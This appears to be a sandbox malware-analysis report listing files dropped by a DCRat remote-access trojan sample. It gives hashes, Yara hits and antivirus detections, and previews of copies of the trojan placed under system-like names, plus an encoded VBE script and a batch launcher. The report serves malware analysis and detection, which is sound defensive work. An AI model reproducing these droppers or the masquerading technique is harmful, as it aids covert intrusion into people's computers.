                                                          SHA-512:F9F02A8FCE6568D29289DBFFFF2F2C669986BBBC97C475E35791A3212C04CED3B85726B889BCA3B12C0DC9AA96D7949DD2E107BD2B8D7E75506552B0694D8275
                                                          Malicious:false
                                                          Preview:wK4nWChWCt2LMbRGDmlNVXBh6mMFrHRcSWRKeFv9rvMGqQC1tLrkHdvZJWqt0co4ca30JHm81mgkK41qkUWgZqUyk2AIYBIPGSoQWMrljtsf6LPOeAJf

                                                          C:\Program Files (x86)\jDownloader\config\explorer.exe

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):844800
                                                          Entropy (8bit):5.462969450133416
                                                          Encrypted:false
                                                          SSDEEP:12288:jVTnKIxG7yLfHB7cymJJMA+bpW3Ari4VVyZC0+1cw2jINofMVbZZ6:jVTney9cyQJMA+b3iE0nHA6
                                                          MD5:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          SHA1:14E60E202C180152757A89D13D9989EC35E1F5A2
                                                          SHA-256:AD372EDD698062A90F4744DA16F88CC5BB45CA9B1CB70FC7350673D293F2BC16
                                                          SHA-512:E80449CDE93D19790E64C1FE24AF1AEB00A3C392B4D57A529205A2339BBAA675B6EE21D2D068D65EF21C37D23D2F1B8B458706068FFE850410DC290C4D5C0CE3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\jDownloader\config\explorer.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..g............................n.... ........@.. .......................@............@.....................................S....... .................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B................P.......H.......X....0......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                          C:\ProviderserverruntimeperfSvc\0b66e45408a14f

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:ASCII text, with very long lines (503), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):503
                                                          Entropy (8bit):5.8731118905923845
                                                          Encrypted:false
                                                          SSDEEP:12:FNpMriHkuvrnJpzDzCfWqsBLk88tEpCRCeHxM82mW2X/Kc:F7PPnnzDzKZs9n8tEG9Hh2mvt
                                                          MD5:1B47589743AC0159B3627BF815242A34
                                                          SHA1:318636755B518E54DB01044649B371D049F6D79B
                                                          SHA-256:58DDC2F31160596651EB92E7825589F753C70A2E22468FE15970475E9CCADC96
                                                          SHA-512:41B457046A851E9132724D34F86891003954E61E0FF8EE341BA70E13A5C18AAC77BA8252D31B45491E733B3EEABF784936E34680E13BD369F8833F4629493456
                                                          Malicious:false
                                                          Preview:a1BidN6VnwPPkXnyO0P66BhSvky7SqAtiF0LMDaVm4bIuFLoIezGApiYUsw3Z9C7wfqegbmKZ3UCkYiqYJzx03s3hc1dQh6n1eVPYrHq2oqGVgy5KGePJOG2ww7EjI327rKFDSRrBI5LNliAn6SKCqdnXdcmtDHtuxJoWs21yxNBT4pKO6an0tzQNhrk0p78BLbZc4o4EbVPdbTcySXxmd3B82azARBJ0PAHdPrTSgjYXkxwNPwhRKVhSZbkez3wZMYNbM8ikDeG3eoXEnlvfd1p3czExHzdmx9LLkVBQN6NpPnxvEf0NHQ6UsU8W4vdOBdGfcLeSkfSgnAoyBTtl8QegD0cQWoVcd9ovgSS2Binm7ZqspJVlB1Pu8kclsO55K0DoV3RtA1kan2inKukMTualt3w60qJxmrbHWCWw2mkKRzHFByb8nslZZb4cGV2Urwx5aaRHXxUrJQU4vq4BOLJ4FCr4H4qhtQdeBMokhUl0X4PJH9qZa0

                                                          C:\ProviderserverruntimeperfSvc\26c12092da979c

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:RAGE Package Format (RPF),
                                                          Category:dropped
                                                          Size (bytes):85
                                                          Entropy (8bit):5.307641047999533
                                                          Encrypted:false
                                                          SSDEEP:3:kPVk8QdUJ+0TsnT3juXhgqa2WDfn:ktk8QWw0TU3SX2R2gf
                                                          MD5:02270DAE0A935C621C7CD866FC18C0B1
                                                          SHA1:06E74ED7ED417C717058948512AB1D2E65B327A8
                                                          SHA-256:FEE0034A1025355471DB541D1972363DB34030CE5B9B42FA3B06C1676C121C60
                                                          SHA-512:F53C14C273C3A28391324C13BEC84B7B68424261E3E1D0C21FA1F409869DC11ACEEC664DD3C5ED850DE22757A1EB5AAA49652B7481626E819D07A5748BADEC33
                                                          Malicious:false
                                                          Preview:PRGdj0dRd1QkTXmu7q8z1ZnwnY2nJ8x2KS6afFK2BpsX74qv2VKyxPM0oT0K80IeEXZBbMO1gGxMrPysrGuxx

                                                          C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\SPISOK_DENEG.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):250
                                                          Entropy (8bit):5.871911059647132
                                                          Encrypted:false
                                                          SSDEEP:6:GhwqK+NkLzWbHK/818nZNDd3RL1wQJRWyOKIdEwv4R77lym0wI8gt/WU:G0MCzWLKG4d3XBJ2KIdEwv4FiwIxxX
                                                          MD5:D8776D21A414703FCF32711BB7ECDFB4
                                                          SHA1:1C6820CA5097513A2BE072A3B43EFF1FC8403184
                                                          SHA-256:BB5A09775DCAEB1C3C4D3CDD4C207C96F1A153AA23FED7512367ECA6A3A0C22D
                                                          SHA-512:AD33CA536CC149301BA111280388A9A6295DDD7C2BE76FA3EEFBA8CAB1F2727A4EFFC57B24ADBF0BE8F10C2D13872C215F9512DD470990541B39E2D2681595A9
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:#@~^4QAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJn.K\bN+M/..\.D.E.Yrh.w+MW?7mzJAU.0KK0tk.^\DotqBtlbF9gtonj"wd5gr.1p~4;%*S}! 4mYE~,!S~6lVknOUoAAA==^#~@.

                                                          C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\SPISOK_DENEG.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):844800
                                                          Entropy (8bit):5.462969450133416
                                                          Encrypted:false
                                                          SSDEEP:12288:jVTnKIxG7yLfHB7cymJJMA+bpW3Ari4VVyZC0+1cw2jINofMVbZZ6:jVTney9cyQJMA+b3iE0nHA6
                                                          MD5:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          SHA1:14E60E202C180152757A89D13D9989EC35E1F5A2
                                                          SHA-256:AD372EDD698062A90F4744DA16F88CC5BB45CA9B1CB70FC7350673D293F2BC16
                                                          SHA-512:E80449CDE93D19790E64C1FE24AF1AEB00A3C392B4D57A529205A2339BBAA675B6EE21D2D068D65EF21C37D23D2F1B8B458706068FFE850410DC290C4D5C0CE3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..g............................n.... ........@.. .......................@............@.....................................S....... .................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B................P.......H.......X....0......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                          C:\ProviderserverruntimeperfSvc\ctfmon.exe

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):844800
                                                          Entropy (8bit):5.462969450133416
                                                          Encrypted:false
                                                          SSDEEP:12288:jVTnKIxG7yLfHB7cymJJMA+bpW3Ari4VVyZC0+1cw2jINofMVbZZ6:jVTney9cyQJMA+b3iE0nHA6
                                                          MD5:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          SHA1:14E60E202C180152757A89D13D9989EC35E1F5A2
                                                          SHA-256:AD372EDD698062A90F4744DA16F88CC5BB45CA9B1CB70FC7350673D293F2BC16
                                                          SHA-512:E80449CDE93D19790E64C1FE24AF1AEB00A3C392B4D57A529205A2339BBAA675B6EE21D2D068D65EF21C37D23D2F1B8B458706068FFE850410DC290C4D5C0CE3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..g............................n.... ........@.. .......................@............@.....................................S....... .................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B................P.......H.......X....0......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                          C:\ProviderserverruntimeperfSvc\wnVkTofZircZrFhWJh5AKDNhgeSRpsYNieNXBbC85wZu.bat

                                                          Download File
                                                          Process:C:\Users\user\Desktop\SPISOK_DENEG.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):110
                                                          Entropy (8bit):5.0634698325180425
                                                          Encrypted:false
                                                          SSDEEP:3:2pzMKCk2N+mpZIl2uROVep1MNX6A0EAjn2fi:f9wmolRRODdAj2fi
                                                          MD5:9C91FE8E1765DDF30EDA4052CBECBF48
                                                          SHA1:8ACEC401BDEC034D55EAD6804C69505C1D680E67
                                                          SHA-256:9420D7930AE9F2040D5B46BC120DA24E920FCCF6882E69B74269F71E75CC0718
                                                          SHA-512:E72EC080AE8FC66A5F712E3A525F0013D406B587523B3B6FF8DC80F12F12AF183FC77B578293808F07E916A8B6F2252206B3C899200D0F70540CB70DE467EA87
                                                          Malicious:false
                                                          Preview:%BPkFMVYRvu%%fdibounXfdogAS%..%vsDdPP%"C:\ProviderserverruntimeperfSvc/ChainPortsurrogate.exe"%FBoBBzENDIVjpr%

                                                          C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):844800
                                                          Entropy (8bit):5.462969450133416
                                                          Encrypted:false
                                                          SSDEEP:12288:jVTnKIxG7yLfHB7cymJJMA+bpW3Ari4VVyZC0+1cw2jINofMVbZZ6:jVTney9cyQJMA+b3iE0nHA6
                                                          MD5:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          SHA1:14E60E202C180152757A89D13D9989EC35E1F5A2
                                                          SHA-256:AD372EDD698062A90F4744DA16F88CC5BB45CA9B1CB70FC7350673D293F2BC16
                                                          SHA-512:E80449CDE93D19790E64C1FE24AF1AEB00A3C392B4D57A529205A2339BBAA675B6EE21D2D068D65EF21C37D23D2F1B8B458706068FFE850410DC290C4D5C0CE3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..g............................n.... ........@.. .......................@............@.....................................S....... .................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B................P.......H.......X....0......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                          C:\Recovery\f95864b6b578b9

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:ASCII text, with very long lines (402), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):402
                                                          Entropy (8bit):5.804126895440589
                                                          Encrypted:false
                                                          SSDEEP:12:BkRQmbx1prpNs10WjnwBASy2EX4dBoDJSWEh4T:ef1lWjwBAh2EXjYWrT
                                                          MD5:102F51680FADF5806C9F206AAADF72F5
                                                          SHA1:E11B9845B9F84B43D6FB000B83FA6C85F85C5AF0
                                                          SHA-256:FAF9E396DB47687AE7D42E40FE88C980E2901205C2EB592E5EF90E4A23363CC1
                                                          SHA-512:98C332999177171BC4C8D511083B2E61061DE8E322A3CBBEEB6755DB3EA720300574B192D4EE45D6DC04896BB302B98B75B64CB1EE18D6F1D6EF11418D7EC12C
                                                          Malicious:false
                                                          Preview:sW9cHx83xz2jBTe4kTgLwixHOQG2K61IWQ1KUIsk6VWRHGXGVL6UWolKi1O0qFt08uNvbUjbk6PaMfAH3Ag8Agvrorlc3130mfTW3moBmetaYL7D0G7piuzb8fHusGhsCZyqMoORWfWgwVTdtilw4NR1q1XXe4Sf6AY9WR0M2qTDYTonMnAKfvyyH6AUQ1wcM1kw6TGcrZ4O4NdXMuK13IALMj2ZRg6B311gt2q3hicF0k43dnHgq5iD1YkXbqLLc3UDW6nUDRTVp4Ulp86nYZU8SxpUSTb0XRn6P1hh9xdYlNX6D8rduhwDiVuiQTBuzd7YRYVyaYol66XEZsQUl8G0ejX4G9QpwtiIP9ppm3CV2LGm8qIhCqI1WH3rAbsbI8zNYPyaDlsr6u7Tdv

                                                          C:\Users\Default\Documents\5940a34987c991

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):155
                                                          Entropy (8bit):5.562491567694741
                                                          Encrypted:false
                                                          SSDEEP:3:JQ5MPoJK2GirCLE2E3+A6yTCjvHYkRevE53IKTyAU0zQlKxyGIX7jHY1tfn:+c5UIfMa8CjLUsmCtVzQlKUfX7jOtf
                                                          MD5:738151E13F8E1BE31D29C42956977DE9
                                                          SHA1:182BCF64C61927BFACDE3706C87F9F1238CB04BA
                                                          SHA-256:649A72D39B47626493434C0EC16B495F9D98095164AC468268C68D4B4804BD13
                                                          SHA-512:050E56E0A9E55CF61F061720966E263C0B77502D0CC58356A05662FFC205D26DB572E4E0E71C7A3C38A1D44FF2D35C0872F4946CF7ADA8AD25A000BDE60F0DDA
                                                          Malicious:false
                                                          Preview:Aeuu9R7vj2LqAMlaFSYnmfTt87TFXbgfGqgnZLwSaQkgvN7jwoqEDigeLBvB71XHWqkUq7A4gFMW5w7uAuTtvbchJBcYZuVj3dKFnm3ynwi7WKjYDBBNhoV5ODKofmewunccm2HY1fG93eK9cDVYsHBPHP0

                                                          C:\Users\Default\Documents\dllhost.exe

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):844800
                                                          Entropy (8bit):5.462969450133416
                                                          Encrypted:false
                                                          SSDEEP:12288:jVTnKIxG7yLfHB7cymJJMA+bpW3Ari4VVyZC0+1cw2jINofMVbZZ6:jVTney9cyQJMA+b3iE0nHA6
                                                          MD5:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          SHA1:14E60E202C180152757A89D13D9989EC35E1F5A2
                                                          SHA-256:AD372EDD698062A90F4744DA16F88CC5BB45CA9B1CB70FC7350673D293F2BC16
                                                          SHA-512:E80449CDE93D19790E64C1FE24AF1AEB00A3C392B4D57A529205A2339BBAA675B6EE21D2D068D65EF21C37D23D2F1B8B458706068FFE850410DC290C4D5C0CE3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\Documents\dllhost.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..g............................n.... ........@.. .......................@............@.....................................S....... .................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B................P.......H.......X....0......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ChainPortsurrogate.exe.log

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1830
                                                          Entropy (8bit):5.3661116947161815
                                                          Encrypted:false
                                                          SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHmHKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKktGqZ4vtd
                                                          MD5:4E98592551BD0B069F525D5145C4AB1D
                                                          SHA1:F76B60DC100FAB739EB836650B112348ED7B9B97
                                                          SHA-256:171B3D8F6F3559D645DECCA2C9B750EBFD5511B6742C0157C60F46EAD6CC4F5E
                                                          SHA-512:E5C520597C414A3F73AF0C4F2E2A61CE594D8CEC7FF103D94CCAEA905E0D5F6AF32CFAB40026865AE86172904F927B928663C9FA4B0EBD397CC450BF124A318D
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\EbnrVuXczrPqjyiJGoZ.exe.log

                                                          Download File
                                                          Process:C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):1281
                                                          Entropy (8bit):5.370111951859942
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                          MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                          SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                          SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                          SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ctfmon.exe.log

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ctfmon.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):1281
                                                          Entropy (8bit):5.370111951859942
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                          MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                          SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                          SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                          SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dllhost.exe.log

                                                          Download File
                                                          Process:C:\Users\Default\Documents\dllhost.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):1281
                                                          Entropy (8bit):5.370111951859942
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                          MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                          SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                          SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                          SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log

                                                          Download File
                                                          Process:C:\Program Files (x86)\jDownloader\config\explorer.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):1281
                                                          Entropy (8bit):5.370111951859942
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                          MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                          SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                          SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                          SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                          C:\Users\user\AppData\Local\Temp\F5FGwLO93L

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.323856189774723
                                                          Encrypted:false
                                                          SSDEEP:3:hwInrUUz:h1rl
                                                          MD5:7F91C915756AE659EF4C24BEFFDCCBF8
                                                          SHA1:944AED3CFBED200A1E087CAC616970D35EBA4442
                                                          SHA-256:1A6446B38EA25C1DA12B337D58AE59D45466FF85C00D54B7542009F4E87CA044
